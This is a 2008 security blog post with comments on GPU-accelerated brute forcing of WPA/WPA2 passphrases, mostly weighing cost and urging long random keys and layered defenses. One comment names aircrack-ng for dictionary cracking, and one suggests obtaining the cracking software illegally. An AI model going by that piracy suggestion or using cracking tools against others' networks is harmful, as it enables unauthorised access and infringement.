Oct 10 2008

Brute force attacks against WPA/WPA2 using Nvidia cards

Published by at 6:39 am under Encryption,Security Advisories

According to The Register, Russian company Elcomsoft has made a major jump in cracking WPA and WPA2 passwords using Nvidia graphic cards to brute force the passwords.  They say that a system with two Nvidia GTX 280 video cards in it can crack the passphrase 100 times faster than anything before.

Does that mean it’s time to shut down all you’re wifi and only use your wired network?  Not really, since this requires specialized hardware and software.  Not everyone can afford $800 just for two video cards, let alone the $600 for Elcomsoft’s software and the ~$500 it costs to buy rest of the parts required to build a computer.  That’s not a trivial investment for most of us, especially right now.

If this was a piece of open source software that ran on any GPU, I’d be scared.  It’d be a real blow to wireless encryption technology.  But given the cost of the product and hardware, I doubt many people will be breaking WPA passwords in the near future.  However, the people out there who are targeting specific businesses looking looking for specific information will love this tool and use it often.  Can you say “corporate espionage”?

Don’t abandon your wifi yet, but continue to take the precautions you should be taking anyway.  Put your wireless on it’s own network, make your users VPN into the corporate network and add as many additional layers of security as your company lets you.  Issues like this are why security professionals continually use terms like ‘defense in depth’; when one layer of security fails, you need to have other protections in place to make sure you aren’t pwned like TJX.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

13 responses so far

13 Responses to “Brute force attacks against WPA/WPA2 using Nvidia cards”

  1. David Bergerton 10 Oct 2008 at 7:06 am

    Martin – I agree with all of this, but one thing: a $2000 investment is a small entry for this – depending of the value of the data that could be obtained on the wireless networks and resold, I also disagree that video cards that can be purchased at amazon.com and other big box retailers are classified as “specialized hardware” to attackers – What I could not get from the article was the amount of time it would take – that is the real piece of data that we should be concerned about, and other controls working in concert as you mentioned.

  2. Martinon 10 Oct 2008 at 7:21 am


    I agree that $2000 is small change if you’re a pen tester or organized crime hacker looking to compromise a specific target. But for the average script kiddie or curious security professional, it’s way out of line. That was why I put in the line about corporate espionage. And the link to Amazon was just to show how much the hardware costs, not a scientific study to find the lowest prices. :-)

    Good point on the amount of time it takes too. But if this brings brute forcing a password down to a week or two rather than months or years, the same class of people who’d be willing to spend $2000 on the computer and software aren’t going to be deterred.


  3. windexh8eron 10 Oct 2008 at 11:14 am

    I’m not sure this is a big a deal as stated. For one, you should be using 802.1x along with WPA2 regardless of if you’re using it at home or not (maybe I should publish my documentation on implementing WPA2 Enterprise with EAP-TLS for the average user). If you’re using PSK you’re asking for it and with airolib-ng and aircrack-ng if you’re using any sort of dictionary word as your PSK anyone can crack it in relatively short period of time if the DB is prehashed (i.e. rainbowtable-like for WPA[1/2] PSK).

    If you do want to stick with PSK then what most people should be doing is using an (actual) randomly generated PSK that’s 64 characters in length. I would be hard pressed to believe that Elcomsoft with 8 GPUs could crack that value in less than longer than my lifetime (and hundreds of years after)… It’s just not feasible, which, again why I’m not sure this is that big of a deal. Just look at these numbers:


    And then look at this:


    So even if I could run 1,000,000 attempts per second against a 20 (fully random) character PSK you’re never going to be able to do it quick enough for it to be feasible. This is just marketing FUD — but then again I haven’t been using PSK on my wireless networks for about 2 years. :)

    BTW — if you want that secure PSK that’s randomly generated just run this from any Linux box with OpenSSL installed:

    openssl rand -base64 64

    This will give you 64 characters of random PSK goodness that you won’t have to worry about! Crack that Elcomsoft…

  4. windex8eron 10 Oct 2008 at 11:22 am

    Sorry, my bad… Max is 63 characters for WPA!

    And here’s another good reference (scroll to the end and read the @$$ covering section if you don’t want to read the other stuff):


    I haven’t seen any of my clients using WPA PSK — so big corporate espionage is relatively unlikely. Most use a PEAP solution from what I’ve seen. If a business is using PSK they better have a darn good reason to be doing so! Considering I won’t even do it at home…

  5. Steveon 10 Oct 2008 at 12:14 pm

    63 characters using lower case, upper case,numbers,symbols, provides 94 choices for each character. if I use a 63 character password, that 63 character password could be one of 1.9 * 10 ^126 possible choices. If you want to have a 100% chance of brute forcing this key in one year one would still need to execute 6*10^118 trys a second.

    It would be faster to attack the 256 bit hash as this only has 1.1*10^77 permutations. So if one could issue 3.6 *10^69 commands per second one could guarantee a break in one year. Lets assume that it takes 10 flops (floating point operations) to test one key. As of August SETI@HOME is executing an average of 150 terra-flops (150*10^12). Therefore one would still need ~ 2.5 *10^56 SETI@HOME projects to break one key in one year.
    The most efficient computer uses 2.8 watts per GFLOP. Therefore it would take 2.5*10^59 watts to break one key. Since the average usages of power for all people on the planet is 15 TW we would need 1.5*10^46 times the current power output of the planet to break one key.

    I think my key is safe.

  6. Martinon 10 Oct 2008 at 1:51 pm

    So basically, what you guys are telling me is that unless someone is a complete idiot when it comes to securing their wireless network, this shouldn’t make one whit of difference to them. If they’re an idiot, this still won’t make a difference.


  7. […] V?l šo to intersantu no t?klu droš?bas speci?listiem var palas?t mckeay.net blog?. […]

  8. […] I didn’t have the time on Friday to look deeper into the real time requirements to hack a WPA password using Elcomsoft’s new tools.  I knew the time needed was considerable, but I didn’t realize exactly how long […]

  9. windexh8eron 14 Oct 2008 at 4:23 am


    Basically! Schneier ran a post this morning about it as well. The jist is – weak passwords are weak. The 100 fold increase doesn’t really buy us much, unless minutes are crucial.


  10. Jeff Martenson 19 Oct 2008 at 10:36 am

    100-fold speed up is just under a factor of 2^7. So this is like reducing a 256 bit key to 249 bits. Not a big deal.

  11. […] one keen commenter pointed out, the reality and sheer mathematics behind it is mind boggling. WPA2 can be 63 characters using […]

  12. Orionon 04 Mar 2009 at 5:53 am

    It’s true that right now this is such a big deal,

    but what about abut custom build FPGA boards , those are relativley simple to build and should decrease time considarebly??

  13. ZeeLaGon 07 Jul 2010 at 10:48 am

    ok you can take off the cost that it takes for the Elcomsoft’s software. cause you can get it for FREE!!!! but illegally free. but if you going to get a software the cracks passwords and use it for illegal purposes than what is the point? so just get a good enogh computer with good amout of RAM and a Great GPU and youll set..

    Software is always FREE but when it comes to the hardware…. that when you have to PAY!!

Trackback URI | Comments RSS

Leave a Reply

%d bloggers like this: